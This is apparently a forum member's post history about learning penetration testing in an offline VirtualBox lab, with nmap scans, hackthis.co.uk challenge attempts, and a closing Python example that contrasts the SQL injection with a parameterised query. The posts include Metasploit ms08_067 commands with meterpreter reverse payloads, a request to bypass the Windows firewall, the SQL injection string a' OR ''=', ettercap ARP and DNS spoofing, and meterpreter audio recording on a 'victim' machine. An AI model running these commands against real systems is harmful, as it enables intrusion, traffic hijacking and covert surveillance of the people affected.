
pierre
Active Members
Posts: 106
Joined
Last visited

Everything posted by pierre

  1. Hello, Habitually with Metasploit, I do this:
     1. Pick an exploit
     2. Set exploit options
     3. Pick a payload
     4. Set payload options
     5. Run exploit
     6. Connect to the remote
     7. Perform post-exploitation process
     But then I discovered that I can do this:
     1. Create a .exe payload with options
     2. "use multi/handler" in metasploit
     3. Set handler options
     4. Wait for a victim payload execution
     6. Connect to the remote
     7. Perform post-exploitation process
     What is "multi/handler" ??
  2. Yes, and because it is a virtual machine, MAC resolution isn't effective.. Yes, it is like the netdiscover command, but thanks anyway :)
  3. Hello, I have difficulties identifying the target operating system. Basically, I thought an nmap scan might be all I need, but no. Here is my offline network topology : I run this nmap scan :

     root@osboxes:~# nmap -T4 -A -v 192.168.0.2
     Starting Nmap 7.01 ( https://nmap.org) at 2016-04-26 08:08 EDT
     NSE: Loaded 132 scripts for scanning.
     NSE: Script Pre-scanning.
     Initiating NSE at 08:08
     Completed NSE at 08:08, 0.00s elapsed
     Initiating NSE at 08:08
     Completed NSE at 08:08, 0.00s elapsed
     Initiating ARP Ping Scan at 08:08
     Scanning 192.168.0.2 [1 port]
     Completed ARP Ping Scan at 08:08, 0.00s elapsed (1 total hosts)
     Initiating Parallel DNS resolution of 1 host. at 08:08
     Completed Parallel DNS resolution of 1 host. at 08:08, 13.00s elapsed
     Initiating SYN Stealth Scan at 08:08
     Scanning 192.168.0.2 [1000 ports]
     Completed SYN Stealth Scan at 08:08, 21.21s elapsed (1000 total ports)
     Initiating Service scan at 08:08
     Initiating OS detection (try #1) against 192.168.0.2
     Retrying OS detection (try #2) against 192.168.0.2
     NSE: Script scanning 192.168.0.2.
     Initiating NSE at 08:08
     Completed NSE at 08:08, 0.00s elapsed
     Initiating NSE at 08:08
     Completed NSE at 08:08, 0.00s elapsed
     Nmap scan report for 192.168.0.2
     Host is up (0.0015s latency).
     All 1000 scanned ports on 192.168.0.2 are filtered
     MAC Address: 08:00:27:3B:98:9D (Oracle VirtualBox virtual NIC)
     Too many fingerprints match this host to give specific OS details
     Network Distance: 1 hop

     TRACEROUTE
     HOP RTT     ADDRESS
     1   1.52 ms 192.168.0.2

     NSE: Script Post-scanning.
     Initiating NSE at 08:08
     Completed NSE at 08:08, 0.00s elapsed
     Initiating NSE at 08:08
     Completed NSE at 08:08, 0.00s elapsed
     Read data files from: /usr/bin/../share/nmap
     OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
     Nmap done: 1 IP address (1 host up) scanned in 38.16 seconds
                Raw packets sent: 2049 (94.700KB) | Rcvd: 1 (28B)

     Nothing conclusive...

     If I turn off the Windows firewall and I run the same scan :

     root@osboxes:~# nmap -T4 -A -v 192.168.0.2
     Starting Nmap 7.01 ( https://nmap.org) at 2016-04-26 08:10 EDT
     NSE: Loaded 132 scripts for scanning.
     NSE: Script Pre-scanning.
     Initiating NSE at 08:10
     Completed NSE at 08:10, 0.00s elapsed
     Initiating NSE at 08:10
     Completed NSE at 08:10, 0.00s elapsed
     Initiating ARP Ping Scan at 08:10
     Scanning 192.168.0.2 [1 port]
     Completed ARP Ping Scan at 08:10, 0.00s elapsed (1 total hosts)
     Initiating Parallel DNS resolution of 1 host. at 08:10
     Completed Parallel DNS resolution of 1 host. at 08:10, 13.00s elapsed
     Initiating SYN Stealth Scan at 08:10
     Scanning 192.168.0.2 [1000 ports]
     Discovered open port 139/tcp on 192.168.0.2
     Discovered open port 135/tcp on 192.168.0.2
     Discovered open port 3389/tcp on 192.168.0.2
     Discovered open port 49157/tcp on 192.168.0.2
     Discovered open port 49155/tcp on 192.168.0.2
     Discovered open port 49153/tcp on 192.168.0.2
     Discovered open port 445/tcp on 192.168.0.2
     Discovered open port 49156/tcp on 192.168.0.2
     Discovered open port 49152/tcp on 192.168.0.2
     Discovered open port 49154/tcp on 192.168.0.2
     Completed SYN Stealth Scan at 08:10, 1.34s elapsed (1000 total ports)
     Initiating Service scan at 08:10
     Scanning 10 services on 192.168.0.2
     Service scan Timing: About 50.00% done; ETC: 08:12 (0:00:53 remaining)
     Completed Service scan at 08:11, 58.59s elapsed (10 services on 1 host)
     Initiating OS detection (try #1) against 192.168.0.2
     NSE: Script scanning 192.168.0.2.
     Initiating NSE at 08:11
     Completed NSE at 08:11, 6.71s elapsed
     Initiating NSE at 08:11
     Completed NSE at 08:11, 0.01s elapsed
     Nmap scan report for 192.168.0.2
     Host is up (0.00072s latency).
     Not shown: 990 closed ports
     PORT      STATE SERVICE            VERSION
     135/tcp   open  msrpc              Microsoft Windows RPC
     139/tcp   open  netbios-ssn        Microsoft Windows 98 netbios-ssn
     445/tcp   open  microsoft-ds       Microsoft Windows 10 microsoft-ds
     3389/tcp  open  ssl/ms-wbt-server?
     | ssl-cert: Subject: commonName=IE10Win7
     | Issuer: commonName=IE10Win7
     | Public Key type: rsa
     |_SHA-1: 005b cc4b 4154 6ddc 6b7e 22f2 05d5 fcb8 c7a4 27d2
     |_ssl-date: 2016-04-26T12:11:36+00:00; 0s from scanner time.
     49152/tcp open  msrpc              Microsoft Windows RPC
     49153/tcp open  msrpc              Microsoft Windows RPC
     49154/tcp open  msrpc              Microsoft Windows RPC
     49155/tcp open  msrpc              Microsoft Windows RPC
     49156/tcp open  msrpc              Microsoft Windows RPC
     49157/tcp open  msrpc              Microsoft Windows RPC
     MAC Address: 08:00:27:3B:98:9D (Oracle VirtualBox virtual NIC)
     Device type: general purpose
     Running: Microsoft Windows 7|2008|8.1
     OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
     OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows 8, or Windows 8.1 Update 1
     Uptime guess: 0.005 days (since Tue Apr 26 08:04:02 2016)
     Network Distance: 1 hop
     TCP Sequence Prediction: Difficulty=260 (Good luck!)
     IP ID Sequence Generation: Incremental
     Service Info: OSs: Windows, Windows 98, Windows 10; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_10

     Host script results:
     | nbstat: NetBIOS name: IE10WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:3b:98:9d (Oracle VirtualBox virtual NIC)
     | Names:
     |   IE10WIN7<00>                 Flags: <unique><active>
     |   WORKGROUP<00>                Flags: <group><active>
     |   IE10WIN7<20>                 Flags: <unique><active>
     |   WORKGROUP<1e>                Flags: <group><active>
     |   WORKGROUP<1d>                Flags: <unique><active>
     |_  \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
     | smb-os-discovery:
     |   OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
     |   OS CPE: cpe:/o:microsoft:windows_7::sp1
     |   Computer name: IE10Win7
     |   NetBIOS computer name: IE10WIN7
     |   Workgroup: WORKGROUP
     |_  System time: 2016-04-26T05:11:36-07:00
     | smb-security-mode:
     |   account_used: guest
     |   authentication_level: user
     |   challenge_response: supported
     |_  message_signing: disabled (dangerous, but default)
     |_smbv2-enabled: Server supports SMBv2 protocol

     TRACEROUTE
     HOP RTT     ADDRESS
     1   0.72 ms 192.168.0.2

     NSE: Script Post-scanning.
     Initiating NSE at 08:11
     Completed NSE at 08:11, 0.00s elapsed
     Initiating NSE at 08:11
     Completed NSE at 08:11, 0.00s elapsed
     Read data files from: /usr/bin/../share/nmap
     OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
     Nmap done: 1 IP address (1 host up) scanned in 82.07 seconds
                Raw packets sent: 1055 (47.118KB) | Rcvd: 1018 (41.450KB)

     Here there is much more result. So how can I have at least OS detection without having to turn off the firewall ? Thanks
  4. Thank you very much haicen, I understand it very well now.
  5. Thanks, I'll have a look at the tuto :)
  6. Hmm, so previously the client has to be social-engineered
  7. root@osboxes:~# ping 192.168.0.3
     PING 192.168.0.3 (192.168.0.3) 56(84) bytes of data.
     ^C
     --- 192.168.0.3 ping statistics ---
     3 packets transmitted, 0 received, 100% packet loss, time 2016ms

     root@osboxes:~# nmap -p 445 192.168.0.3
     Starting Nmap 7.01 ( https://nmap.org) at 2016-04-14 11:17 EDT
     Nmap scan report for 192.168.0.3
     Host is up (0.00048s latency).
     PORT    STATE    SERVICE
     445/tcp filtered microsoft-ds
     MAC Address: 08:00:27:A5:80:AD (Oracle VirtualBox virtual NIC)
     Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds

     The firewall is well activated, so port 445 is filtered and doesn't respond to connection attempts, so metasploit fails, right ?
  8. I tried both the http and https payloads, no results

     msf > use exploit/windows/smb/ms08_067_netapi
     msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
     RHOST => 192.168.0.3
     msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_https
     payload => windows/meterpreter/reverse_https
     msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
     LHOST => 192.168.0.1
     msf exploit(ms08_067_netapi) > check
     [*] 192.168.0.3:445 - Cannot reliably check exploitability.
     msf exploit(ms08_067_netapi) > exploit
     [*] Started HTTPS reverse handler on https://0.0.0.0:8443/
     [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
     [*] Exploit completed, but no session was created.
     msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_http
     payload => windows/meterpreter/reverse_http
     msf exploit(ms08_067_netapi) > check
     [*] 192.168.0.3:445 - Cannot reliably check exploitability.
     msf exploit(ms08_067_netapi) > exploit
     [*] Started HTTP reverse handler on http://0.0.0.0:8080/
     [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
     [*] Exploit completed, but no session was created.

     I am trying to exploit a Windows XP SP2. Yes, but because the destination port is 80 with the http payload, I thought it wouldn't be blocked anymore..
  9. Hello, I am actually working on this exploit. It works well when the XP firewall is turned off. Unfortunately, when I turn it on, the exploit doesn't work anymore. Topology : Procedure :

     msf > use exploit/windows/smb/ms08_067_netapi
     msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
     RHOST => 192.168.0.3
     msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
     payload => windows/meterpreter/reverse_tcp
     msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
     LHOST => 192.168.0.1
     msf exploit(ms08_067_netapi) > check
     [*] 192.168.0.3:445 - Cannot reliably check exploitability.
     msf exploit(ms08_067_netapi) > exploit
     [*] Started reverse TCP handler on 192.168.0.1:4444
     [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
     [*] Exploit completed, but no session was created.

     Have you got any clue to bypass the Windows firewall ?!
  10. Sorry, I misunderstood what I was doing. When I was looking at the level to see if I had achieved it, nothing had changed. But with :

     $ curl -b "PHPSESSID=am87lp4uir35jv2dej3pgn1r72" -A "secure_user_agent" "https://www.hackthis.co.uk/levels/basic+/2" >> test.html
       % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                      Dload  Upload   Total   Spent    Left  Speed
     100 75200    0 75200    0     0  93314      0 --:--:-- --:--:-- --:--:-- 93300

     When I open my test.html : It seems good :) I still don't know why I can't see the result of my command online, but thanks anyway :)
  11. Thanks for your answer. So here is my new command syntax :

     $ curl --user-agent "secure_user_agent" -b "PHPSESSID=bdv19903ltjg6hq0cfbhq6t6a7" https://www.hackthis.co.uk/levels/basic+/2

     It still doesn't work !!! Very demoralizing, because I achieved this with TamperData but I really want to do it by command line ...
  12. Hello, I am trying to change my "user-agent" for a challenge. The problem is that my HTTP request doesn't fail, but my challenge isn't resolved either !! Here is my command :

     $ curl --user-agent "secure_user_agent" -c "PHPSESSID=8pp2qs7kjmjtq7b8423g3o8jj2" https://www.hackthis.co.uk/levels/basic+/2

     Do you know where my error is ?
  13. Hello, I am trying to use the Burp proxy to insert "secure_user_agent" in the header of my HTTP request while connecting to a website. The website is HTTPS. Here is how I proceed :
     1- I add the proxy address
     2- I turn on the proxy in Burp
     3- The proxy is working well
     4- It fails for an HTTPS website !!
     5- A short description from the "alert" section
     So do you know how to access an HTTPS website with Burp ?
  14. Thanks, I understand. For example here : a' OR '1'='1
     - The 1st quote is for the end of the first value
     - The 2nd quote is for the beginning of the 2nd value
     - The 3rd quote is for the end of the 2nd value
     - The 4th quote is for the beginning of the 3rd value
     Finally, no need for a 5th quote, because the 3rd value is auto-shortened, right ?
  15. So the query looks like this to the DB :

     SELECT First_Name,Last_Name FROM users WHERE ID='a' OR ''='';

     when I enter a' OR ''=' on the submit. So I think I've understood the background idea of the boolean. But 2 things :
     1) why do I have to put the first quote after the a ? To escape some restriction ?
     2) why do I have to make a two-statement boolean ? Why doesn't just ''=' work ?
     Thanks :)
     EDIT : I seem to understand the first quote : These produce the same results :) So the first quote marks the end of the first value as you said :) But what about the other part : OR ''=' Just why double quotes before the equal ?
  16. Yes, I see. But why do I have to put the quote : a' OR "=' Is it used to prolong the query ?
  17. Hello, I was wondering how this SQL syntax a' OR ''=' could list database users ?? Thanks
  18. Hello, I have a book which says I can use recon-ng like this :

     recong-ng > use recon/hosts/gather/http/web/google_site

     Firstly, on my shell, the prompt isn't the same. Secondly, I can't find it on the command line... The closest command line is this :

     [recon-ng][default] > use recon/hosts-
     recon/hosts-domains/migrate_hosts
     recon/hosts-hosts/ipinfodb
     recon/hosts-hosts/bing_ip
     recon/hosts-hosts/resolve
     recon/hosts-hosts/freegeoip
     recon/hosts-hosts/reverse_resolve
     recon/hosts-hosts/ip_neighbor

     So the command or module isn't available anymore ? Thanks :)
  19. Hello, I can't understand how to record sound on my victim Windows 7 computer. I exploit the remote computer by a webshell. Here is how I do it : I want a 30 sec audio recording :

     meterpreter > run sound_recorder -i 1 -l /home/lucky

     But then when I look into this folder, nothing :

     root@kali:/home/lucky# ls /home/lucky/logs/sound_recorder/NONAME_20160103.3213/

     Why ???
  20. Thank you very much, it now works very well !! I've just had to remove the dot :) Thank you very much ! :)
  21. It still does not work... Here is my /etc/ettercap/etter.dns configuration :

     microsoft.com      A   192.168.0.1
     *.microsoft.com    A   192.168.0.1
     www.microsoft.com  PTR 192.168.0.1 # Wildcards in PTR are not allowed

     I've done this :

     root@osboxes:~# ettercap -T -i eth0 -P dns_spoof -M arp /192.168.0.2.//
     Thu Dec 24 06:04:37 2015 [797997]
     UDP  192.168.0.2:137 --> 192.168.0.255:137 | (50)
     ............ FHFAEBEECACACACACACACACACACACAAA.. ..
     Thu Dec 24 06:04:38 2015 [358326]
     UDP  192.168.0.2:137 --> 192.168.0.255:137 | (50)
     ............ FHFAEBEECACACACACACACACACACACAAA.. ..
     Thu Dec 24 06:04:38 2015 [547962]
     UDP  192.168.0.2:137 --> 192.168.0.255:137 | (50)
     ............ FHFAEBEECACACACACACACACACACACAAA.. ..
     [same logs..]

     But my W7 computer (I turned off all firewalls) isn't redirected to my own Apache server. When I type 192.168.0.1 in the URL, W7 reaches my Apache server... What's wrongggg ?
  22. *My computers are not connected to the Internet.
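The quote balancing worked through in posts 14 to 17 above, as an added example that is not from the thread or its author: the string-built query from post 15 beside a parameterised version, run against a constructed three-row users table, so the difference in what the database actually receives is visible.

```python
import sqlite3

# Constructed sample data (not from the thread): a users table with a text ID column.
SAMPLE_ROWS = [
    ("1", "Alice", "Smith"),
    ("2", "Bob", "Jones"),
    ("3", "Carol", "White"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (ID TEXT, First_Name TEXT, Last_Name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_query(user_input: str) -> str:
    # The vulnerable pattern from post 15: the input is pasted between the two
    # quotes of ID='...', so quotes inside the input become SQL syntax.
    return "SELECT First_Name,Last_Name FROM users WHERE ID='" + user_input + "'"


def quote_count(sql: str) -> int:
    # Post 14's counting argument: the application's closing quote pairs up
    # with the last quote of the input, so the final statement balances.
    return sql.count("'")


def lookup_vulnerable(conn: sqlite3.Connection, user_input: str) -> list:
    return conn.execute(build_query(user_input)).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_input: str) -> list:
    # Parameterised: the driver passes the input as a value, never as syntax,
    # so a' OR ''=' is simply an ID that matches no row.
    sql = "SELECT First_Name,Last_Name FROM users WHERE ID=?"
    return conn.execute(sql, (user_input,)).fetchall()


def demo(payload: str = "a' OR ''='") -> dict:
    conn = make_db()
    return {
        "query": build_query(payload),
        "quotes": quote_count(build_query(payload)),
        "vulnerable": lookup_vulnerable(conn, payload),  # every row comes back
        "safe": lookup_safe(conn, payload),              # no row matches
        "safe_normal": lookup_safe(conn, "2"),           # normal use still works
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```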